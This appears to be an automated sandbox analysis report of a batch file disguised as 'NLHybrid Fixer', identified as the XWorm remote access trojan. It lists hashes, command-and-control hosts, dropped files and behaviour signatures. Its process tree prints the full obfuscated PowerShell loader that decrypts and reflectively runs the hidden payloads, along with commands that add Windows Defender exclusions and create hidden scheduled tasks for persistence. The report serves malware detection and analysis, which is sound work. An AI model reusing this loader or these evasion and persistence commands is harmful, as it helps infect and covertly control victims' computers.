Analysis

  • max time kernel
    1151s
  • max time network
    1150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2024 06:17

General

  • Target

    NLHybrid Fixer.bat

  • Size

    291KB

  • MD5

    734fdc5c211a7b1fe3a5101c3b0aafd6

  • SHA1

    3d8b84678e674a5b4b49ad4ee4669179d16b75d0

  • SHA256

    0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

  • SHA512

    92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

  • SSDEEP

    6144:uoiULBMXvSD+eFkX0TupDOYvaktWHHvdTNb71M943xw:uLULBM47FNuNOWaxvH7m43a

Malware Config

Extracted

Family

xworm

Version

5.0

C2

remote-newest.gl.at.ply.gg:62113

fund-scared.gl.at.ply.gg:62113

Mutex

UrM5eoX12ULh6st6

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    win64updater.exe

aes.plain

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_627_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_627.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4560
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_627.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_627.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_627.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_627.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:484
            • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe
              "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe"
              6⤵
              • Executes dropped EXE
              PID:1528
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1612
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2648
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4704
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "win64updater" /tr "C:\Users\Admin\win64updater.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:912
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "win64updater"
              6⤵
                PID:3056
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7039.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2092
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:1816
    • C:\Users\Admin\win64updater.exe
      C:\Users\Admin\win64updater.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      661739d384d9dfd807a089721202900b

      SHA1

      5b2c5d6a7122b4ce849dc98e79a7713038feac55

      SHA256

      70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

      SHA512

      81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      b51dc9e5ec3c97f72b4ca9488bbb4462

      SHA1

      5c1e8c0b728cd124edcacefb399bbd5e25b21bd3

      SHA256

      976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db

      SHA512

      0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      4f320df07ce05d3bd03fbfd865aeac57

      SHA1

      2cfae455c1e7fb7238d3dcba6648f6a9bdd8d296

      SHA256

      08590742934077211509331f5e2e37f54a08785bf2745f7c5d975320e2412365

      SHA512

      6756b9ed53998d2fcae0bcf6f37270cb04f9409e15c63dfdd5466a238e096d52ff07b2a02beb7b8e157d4f58ecca8c592815ea738f35725613be4bdf26896bfa

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      4d2c8d8bf93f9450f044c6ef5dff215a

      SHA1

      4d6ecc646ee6c124aaf7535c1387445e02734750

      SHA256

      e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0

      SHA512

      c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      e2efbfd23e33d8d07d019bdd9ca20649

      SHA1

      68d3b285c423d311bdf8dc53354f5f4000caf386

      SHA256

      f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828

      SHA512

      b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443

    • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe

      Filesize

      42KB

      MD5

      269085c7755574a5cd840b298a0b4a55

      SHA1

      3b20a9f3c0e5ed34d37c5c915c07fd93da7d7cbd

      SHA256

      ee94f31406ba029502b3737f9d2c2d2d22448643deaa3095239a55b58b9169c8

      SHA512

      47b5782e53cf03bb5eb8f96584b9e0608bc10038b8721761bf67af75ed0b77a2e51ef94a9d62302e6e0d45885e72d47b80815caa8c063a616d50b646885b5f65

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvw0q5zh.zv4.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmp7039.tmp.bat

      Filesize

      171B

      MD5

      f65643aef8b7d6bb6aad90a2aff89d7b

      SHA1

      faed44d126db9a17ac9e6ec18bd2bcb5127cc7fc

      SHA256

      e5ba26f2c989de7b1e0badb5d8b6e92a9ab686d9e4222740b0d3fb49fae2b21c

      SHA512

      8243d39d5866caa53ef9a32d82b75fd34f1bac84f3d7de327556f9a31bed3692f3de4f339f6f12769ff5bdaebd3c94fb2c9d1effc97482026b2e8b1650f699a3

    • C:\Users\Admin\AppData\Roaming\startup_str_627.bat

      Filesize

      291KB

      MD5

      734fdc5c211a7b1fe3a5101c3b0aafd6

      SHA1

      3d8b84678e674a5b4b49ad4ee4669179d16b75d0

      SHA256

      0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

      SHA512

      92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

    • C:\Users\Admin\AppData\Roaming\startup_str_627.vbs

      Filesize

      115B

      MD5

      fdc5fe751e936956631d0cfa13f233de

      SHA1

      3dd4b2f13dc96df180307392930f6f8fa119885b

      SHA256

      49d97f3d0b8e32a0df682a8d08bca590be9c686cc219d54d153c6ade338d99c9

      SHA512

      0064001c807b9f972a006c89f1491de67f724dbca19d0d0c858b7c7034e3cc5306c010b2a05b7a05ed0b4e6f7936cb56f1ab1733b9df5291673314742f3aeffa

    • C:\Users\Admin\win64updater.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • memory/484-51-0x0000022775980000-0x0000022775990000-memory.dmp

      Filesize

      64KB

    • memory/1408-14-0x000001B3BAC90000-0x000001B3BACCE000-memory.dmp

      Filesize

      248KB

    • memory/1408-0-0x00007FFE156C3000-0x00007FFE156C5000-memory.dmp

      Filesize

      8KB

    • memory/1408-8-0x000001B3A2AF0000-0x000001B3A2B12000-memory.dmp

      Filesize

      136KB

    • memory/1408-11-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB

    • memory/1408-12-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB

    • memory/1408-63-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB

    • memory/1408-13-0x000001B3BAC80000-0x000001B3BAC88000-memory.dmp

      Filesize

      32KB

    • memory/1528-62-0x0000000000C70000-0x0000000000C80000-memory.dmp

      Filesize

      64KB

    • memory/1564-122-0x00000219E6650000-0x00000219E6694000-memory.dmp

      Filesize

      272KB

    • memory/1564-123-0x00000219E8D60000-0x00000219E8DD6000-memory.dmp

      Filesize

      472KB

    • memory/4560-16-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB

    • memory/4560-30-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB

    • memory/4560-26-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB

    • memory/4560-27-0x00007FFE156C0000-0x00007FFE16181000-memory.dmp

      Filesize

      10.8MB